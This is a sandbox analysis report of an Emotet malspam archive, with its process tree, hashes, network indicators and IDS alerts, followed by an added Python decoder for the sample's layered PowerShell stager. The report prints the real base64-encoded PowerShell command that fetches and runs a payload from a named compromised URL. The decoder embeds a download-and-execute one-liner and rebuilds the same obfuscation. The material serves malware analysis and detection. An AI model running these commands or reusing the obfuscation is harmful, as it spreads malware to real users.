File name: | Factura _ HAS834685.7z |
Full analysis: | https://app.any.run/tasks/985894c8-8c7c-46b8-88d7-f5cec3592000 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over its lifetime it was upgraded into very destructive malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns. |
Analysis date: | March 21, 2019, 20:26:01 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-7z-compressed |
File info: | 7-zip archive data, version 0.4 |
MD5: | E6C16FC121EE1CA12C7ABE3983552020 |
SHA1: | 3D7A73416BE409F02A84FEDAA127D1EEB0B2111E |
SHA256: | D4A0BCBF2508F697BD1568F22A12B4F8CC8BC1871ACBB7414FFC9922D0642A5A |
SSDEEP: | 1536:RT0SR+oaBRySe4S8ZVCEzXq6dw3ZTzElswg1DKgBUX++SdBcLCq:V/RpaBRiEV4j32Vg1mOUX+xsmq |
Extension | Description | Score (%) |
---|---|---|
.7z | 7-Zip compressed archive (v0.4) | 57.1 |
.7z | 7-Zip compressed archive (gen) | 42.8 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1896 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Factura _ HAS834685.7z" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
1916 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIb1896.3121\Factura _ HAS834685.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | WinRAR.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
2860 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Facture_Num_HAS834685.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1548 | powershell -e IAAoAG4ARQBXAC0ATwBiAEoAZQBjAFQAIAAgAEkAbwAuAEMAbwBNAFAAcgBlAFMAUwBJAG8ATgAuAEQAZQBmAGwAQQB0AEUAUwBUAFIARQBBAG0AKAAgAFsAcwB5AHMAVABlAE0ALgBpAE8ALgBNAEUATQBPAFIAeQBTAHQAUgBlAGEATQBdACAAWwBTAFkAcwBUAGUAbQAuAGMAbwBuAFYAZQBSAFQAXQA6ADoARgByAG8ATQBCAGEAcwBlADYANABTAFQAUgBJAG4ARwAoACgAJwBYAGQAQgAnACsAJwBiACcAKwAnAGEAOQBzAHcARgBBAEQAZwB2ACcAKwAnADYAJwArACcASQBIAGcAeABLAHkAVwBIAFUAeABoACcAKwAnAGQAVQAnACsAJwBZAGUAaABJAHoATAA5AEMAJwArACcATgAnACsAJwBtAHUAJwArACcARQAnACsAJwAxAG0ARQBHACcAKwAnAFEAJwArACcAbAAnACsAJwBlAE4ATAAnACsAJwA1AFUAJwArACcAagBHAFYAcQBvADAAJwArACcASQAnACsAJwBmACcAKwAnADkAOQBXAHQAWQBMAG0AOQAnACsAJwA2AE8AKwBNADcAVgAnACsAJwBFADcAQwAnACsAJwB3ACcAKwAnAE4AbwBPAFkAdABpAEYAcwAnACsAJwBiAEEAJwArACcAbwAnACsAJwBMACcAKwAnAEcAbgBrACcAKwAnAFcAZwBvAFcAQQBBAG0ASwBGAGQAcQA3AEwASgB4AFMARwAnACsAJwBmAEUAZgBqACcAKwAnAFAAMgAnACsAJwBLADUANwBGAHAAVQBKAHYASwBPAHkAMAB5ACcAKwAnAEsAeABLACcAKwAnAFUAMQB4AHYAUwAnACsAJwAzAGoAJwArACcARgBsACcAKwAnAHIAZgBWAEgAJwArACcAdQBlAEkAMQBLAHYAJwArACcAUABoACcAKwAnAEMANwA1ACcAKwAnAGoAdAA1ADAASQByADQAJwArACcAegAnACsAJwBSAEwAKwAzAFgAJwArACcANQBjACcAKwAnADgALwB1ACcAKwAnAC8AdAAnACsAJwBqAHgARgAnACsAJwBUACcAKwAnAGYAeQA2ACcAKwAnAHYAcgBtAEEAcQArAFAAJwArACcANAA5AE8AdQBsACcAKwAnAE0AeABXACcAKwAnADEAZgAnACsAJwBJAC8AJwArACcAdwA5AFcAMgAzAEwAZQBkADQAWAAnACsAJwAwAC8AJwArACcAWAB1ACcAKwAnAHcAZwAnACsAJwBxAHIAJwArACcASgBsAFgANwAnACsAJwArAEYAJwArACcAMwAnACsAJwBWAC8AJwArACcAcABZAE0AZQAnACsAJwBIAGQAaAAnACsAJwB4ADUAJwArACcAMwAnACsAJwAvAEIAJwArACcAaAB4AHkAJwArACcAKwBvADAAcQBWACcAKwAnAGkAJwArACcAOQAnACsAJwAyACcAKwAnAEQAJwArACcARgAnACsAJwB1ACcAKwAnADYAbABSAEQAegAnACsAJwBYACcAKwAnAEsAZABzACcAKwAnAFQAJwArACcAaAAnACsAJwBJACcAKwAnAGcAeQBPAGgAJwArACcAbQBWAG0AJwArACcAegBhACcAKwAnAGoAJwArACcALwAnACsAJwBvACsAOQBhAE0ANgBGADMAZAAnACsAJwBCACcAKwAnAHAANQBBACcAKwAnAEIAdAAnACsAJwBZAEwAJwArACcAeQBHAEkANgBUAEUAQgBBAE8AdABPAGMAUgAnACsAJwA4ACcAKwAnAFUARQBCAFEAawBKAHYAJwArACcAUgB6AGUATwBQAGkAJwArACcAcgBjADYATABKAEgAUgA3ACcAKwAnAEEANgBSAEoAJwArACcAbAB1ACcAKwAnAFgAdQBxACcAKwAnADAAOABGACcAKwAnAEIAJwArACcATwBzAHMAOQBsAEEAOQAnACsAJwAzACsANQBkACcAKwAnAGkAMwA3ACcAKwAnAFEAVgBkACcAKwAnAHYAaAAnACsAJwBqACcAKwAnAFAANgBpAHMAOQBjAEMAJwArACcATQArAHIAagBBACcAKwAnAFcAbAAnACsAJwBVADYAUQBHADUAYQAnACsAJwBDACcAKwAnAGEAZQBnAGwAeABxACcAKwAnAEMAVABsAHAAJwArACcARgBYAGsAJwArACcANwA1AHYAJwArACcAUgAnACsAJwBrACcAKwAnAGgAcABmACcAKwAnAFQAKwAnACsAJwAvACcAKwAnAFgAOQBSAEYAdgAnACsAJwBWAGEAYgA3ADkANABvAHAAOQAnACsAJwBaAEgAJwArACcAdwBpAGIAeAAzAGQAeABEAHcASgBvAEEAaABqAFcAbwAnACsAJwBnACcAKwAnAEEAJwArACcARABuAGwAYQAnACsAJwAwAEcAJwArACcAaABWAGsAYwAnACsAJwBrAGsAJwArACcAUgBUAE4AZgBHACcAKwAnAGQAeAA5ACcAKwAnAFUATAA5AEQAVgBaACcAKwAnAHUAJwArACcARwAnACsAJwB6AEcAJwArACcAcwBrACcAKwAnADQAWgBWADcAJwArACcAVQAzAEoAYQAnACsAJwBxAFcAYwB0ADgAVgA4ACcAKwAnAFkAZQBRACsANQBEAEUAJwArACcAQwAnACsAJwA0AEIAVQBOAFkAeQBBADIATgBTAGoAJwArACcAZQB4ACcAKwAnAGoAJwArACcATQA1AG4AdwBZADEAJwArACcAbwBUACcAKwAnAHUAZQB6ADkAJwArACcANQBoAEIAJwArACcAbgBzAGkAJwArACcAWQBwAHAARABEAEEAUQBTAE4AZgBnAE0APQAnACkAIAApACwAIABbAHMAWQBTAFQARQBNAC4AaQBPAC4AQwBvAE0AcABSAEUAcwBzAEkAbwBuAC4AYwBPAG0AcABSAGUAUwBzAEkATwBOAE0AbwBkAEUAXQA6ADoARABlAEMAbwBNAHAAcgBlAHMAUwApACAAfAAgAEYAbwByAEUAQQBjAGgALQBvAEIAagBlAEMAVAB7ACAAbgBFAFcALQBPAGIASgBlAGMAVAAgAGkAbwAuAHMAdABSAGUAQQBNAHIARQBhAGQARQByACgAJABfACAALABbAHQARQB4AFQALgBlAG4AQwBvAEQAaQBuAEcAXQA6ADoAYQBTAEMAaQBpACkAfQApAC4AcgBlAEEAZAB0AE8AZQBuAEQAKAApACAAfAAgACYAIAAoACAAJABTAGgAZQBMAEwASQBkAFsAMQBdACsAJABzAGgARQBsAGwASQBkAFsAMQAzAF0AKwAnAHgAJwApAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2252 | "C:\Users\admin\946.exe" | C:\Users\admin\946.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Description: Windows 8 Toast Notification Exit code: 0 Version: 8,6,0,1000 | ||||
1628 | --21281139 | C:\Users\admin\946.exe | — | 946.exe |
User: admin Integrity Level: MEDIUM Description: Windows 8 Toast Notification Exit code: 0 Version: 8,6,0,1000 | ||||
3528 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | — | 946.exe |
User: admin Integrity Level: MEDIUM Description: Windows 8 Toast Notification Exit code: 0 Version: 8,6,0,1000 | ||||
1360 | --9bc43e78 | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | — | wabmetagen.exe |
User: admin Integrity Level: MEDIUM Description: Windows 8 Toast Notification Version: 8,6,0,1000 |
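The process tree above is the classic Emotet maldoc chain: WINWORD.EXE (PID 2860) opens the extracted .doc, PowerShell (PID 1548) appears with wmiprvse.exe as its parent rather than WINWORD.EXE, which is what a macro launching its command through WMI looks like and why a simple "Word spawned PowerShell" parent-child rule misses it. The `-e` argument decodes (UTF-16LE) to a one-liner that base64-decodes a string assembled from many `'..'+'..'` fragments, inflates it with `System.IO.Compression.DeflateStream`, reads it as ASCII and pipes the result into `& ($ShellId[1]+$ShellId[13]+'x')`; because `$ShellId` is `Microsoft.PowerShell`, that expression spells `iex` without the string ever appearing in the command line. The downloaded 946.exe then re-runs itself with a numeric argument, drops a copy as `%LOCALAPPDATA%\wabmetagen\wabmetagen.exe`, and that copy talks to 189.250.145.98:443 over plain HTTP. The decoder below is an added example, not part of the ANY.RUN report; it statically unwraps each of those layers. The second-stage script it round-trips (`SAMPLE_STAGE2`) is constructed for the demo, modelled on the report's HTTP row and the powershell.exe to 946.exe process edge, and is not the decoded content of the real sample.

```python
"""Decoder for the layered PowerShell stager in the report's process tree
(PID 1548): base64/UTF-16LE outer command, a deflate-compressed and
base64-encoded second stage split into quoted chunks, and an invoke
expression built from $ShellId characters."""
import base64
import re
import zlib

# In Windows PowerShell $ShellId is this literal string; index 1 is 'i' and
# index 13 is 'e', so $ShellId[1]+$ShellId[13]+'x' spells "iex".
SHELLID = "Microsoft.PowerShell"

# Constructed second stage for the demo. It mirrors what the report shows
# (GET to the cbmagency.com URL, then 946.exe spawned from powershell.exe)
# but is NOT the decoded content of the real sample.
SAMPLE_STAGE2 = (
    "$u='http://www.cbmagency.com/wp-content/GpXbVu/';"
    "$p=$env:USERPROFILE+'\\946.exe';"
    "(New-Object Net.WebClient).DownloadFile($u,$p);Start-Process $p"
)


def decode_encoded_command(b64: str) -> str:
    """powershell -e / -EncodedCommand carries base64 of UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")


def resolve_shellid(expr: str) -> str:
    """Statically evaluate $ShellId[n] + 'literal' + ... without executing it."""
    parts = []
    for idx, lit in re.findall(r"\$shellid\[(\d+)\]|'([^']*)'", expr, re.I):
        parts.append(SHELLID[int(idx)] if idx else lit)
    return "".join(parts)


def extract_stage2(script: str) -> str:
    """Rejoin the ('a'+'b'+...) chunks passed to FromBase64String and inflate.
    System.IO.Compression.DeflateStream is raw deflate (no zlib header),
    hence wbits=-15."""
    m = re.search(r"FromBase64String\s*\(\s*\((.*?)\)\s*\)", script, re.I | re.S)
    if not m:
        raise ValueError("no FromBase64String(( ... )) call found")
    inner_b64 = "".join(re.findall(r"'([^']*)'", m.group(1)))
    return zlib.decompress(base64.b64decode(inner_b64), -15).decode("ascii")


def decode_stager(encoded_command: str) -> dict:
    """Return the outer script, the inflated second stage and the resolved
    name of the command the second stage is piped into."""
    outer = decode_encoded_command(encoded_command)
    inv = re.search(r"&\s*\(\s*([^)]*\$shellid[^)]*)\)", outer, re.I)
    return {
        "outer": outer,
        "stage2": extract_stage2(outer),
        "invoker": resolve_shellid(inv.group(1)) if inv else None,
    }


def build_sample_stager(stage2: str, chunk: int = 4) -> str:
    """Build a constructed -e argument in the same shape as the report's
    command line (raw deflate, base64, split into quoted chunks, $ShellId
    invoker) so the decoder can be exercised offline."""
    co = zlib.compressobj(9, zlib.DEFLATED, -15)
    b64 = base64.b64encode(co.compress(stage2.encode("ascii")) + co.flush()).decode()
    joined = "+".join(f"'{b64[i:i + chunk]}'" for i in range(0, len(b64), chunk))
    outer = (
        " (nEW-ObJecT Io.CoMPreSSIoN.DeflAtESTREAm( [sysTeM.iO.MEMORyStReaM] "
        f"[SYsTem.conVeRT]::FroMBase64STRInG(({joined}) ), "
        "[sYSTEM.iO.CoMpREssIon.cOmpReSsIONModE]::DeCoMpresS) | ForEAch-oBjeCT{ "
        "nEW-ObJecT io.stReAMrEadEr($_ ,[tExT.enCoDinG]::aSCii)}).reAdtOenD() | "
        "& ( $SheLLId[1]+$shElLId[13]+'x')"
    )
    return base64.b64encode(outer.encode("utf-16-le")).decode()


if __name__ == "__main__":
    result = decode_stager(build_sample_stager(SAMPLE_STAGE2))
    print("invoker :", result["invoker"])
    print("stage 2 :", result["stage2"])
```

To apply it to the real sample, pass the `-e` string from the PID 1548 row to `decode_stager()`; the stager itself reads the inflated bytes with `[text.encoding]::ASCII`, so decoding the second stage as ASCII is what the malware does, not an assumption. `wbits=-15` matters: PowerShell's `DeflateStream` writes a raw deflate stream, and `zlib.decompress` with the default header-expecting mode will reject it.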
PID | Process | Filename | Type | |
---|---|---|---|---|
2860 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRC064.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1548 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X4FXUODOD42Z39M09849.temp | — | |
MD5:— | SHA256:— | |||
2860 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Facture_Num_HAS834685.doc.LNK | lnk | |
MD5:0926F8C0689D0EA52D9DDD8BC1B8B44E | SHA256:CA5A35FFFEA2E3BEA733FCBCE3B7FDCAE1E84A853D09E5530D1D44FDA19A33B7 | |||
1916 | WinRAR.exe | C:\Users\admin\Desktop\Facture_Num_HAS834685.doc | document | |
MD5:136649E1060ED7E4A22957CE286BADCA | SHA256:D31C266BBB5CA7FDF75A87BB226657F5B6A5B06D5E819C9C55594D723809E709 | |||
1548 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C | |||
2860 | WINWORD.EXE | C:\Users\admin\Desktop\~$cture_Num_HAS834685.doc | pgc | |
MD5:36FFAE3E79C5E8A9EA9F68C2EC6B9BDC | SHA256:17346003BA6FC038C9371D948C69AAAC24A9D6E6C638E5FE949A8D4720829B05 | |||
2860 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:A8BFC06F76815570CE78C51AA23DCFC1 | SHA256:83E229F849F4757E54760D818EF65772207AFAC66A4224FE2C9BFEBCB2358F35 | |||
1548 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF10d0a0.TMP | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C | |||
2860 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:548B06B0C4AC2FB378E8518DF29DB057 | SHA256:CBCB295058CF7D76837FCC41AFA5D3D09927E2228AEEC52F4EAEC79FFF0BEB63 | |||
2860 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:B9300A047D2FDAB2305A3B0C62A53DDD | SHA256:A3900EE836B926627F2EC98A2A16C214821F0207B927047C5B9C74650CFF8737 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1548 | powershell.exe | GET | 200 | 192.99.175.156:80 | http://www.cbmagency.com/wp-content/GpXbVu/ | CA | executable | 352 KB | suspicious |
1360 | wabmetagen.exe | POST | 200 | 189.250.145.98:443 | http://189.250.145.98:443/prep/splash/ringin/merge/ | MX | binary | 132 B | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1360 | wabmetagen.exe | 189.250.145.98:443 | — | Uninet S.A. de C.V. | MX | malicious |
1548 | powershell.exe | 192.99.175.156:80 | www.cbmagency.com | OVH SAS | CA | suspicious |
Domain | IP | Reputation |
---|---|---|
www.cbmagency.com | 192.99.175.156 | suspicious |
PID | Process | Class | Message |
---|---|---|---|
1548 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
1548 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
1548 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
1360 | wabmetagen.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |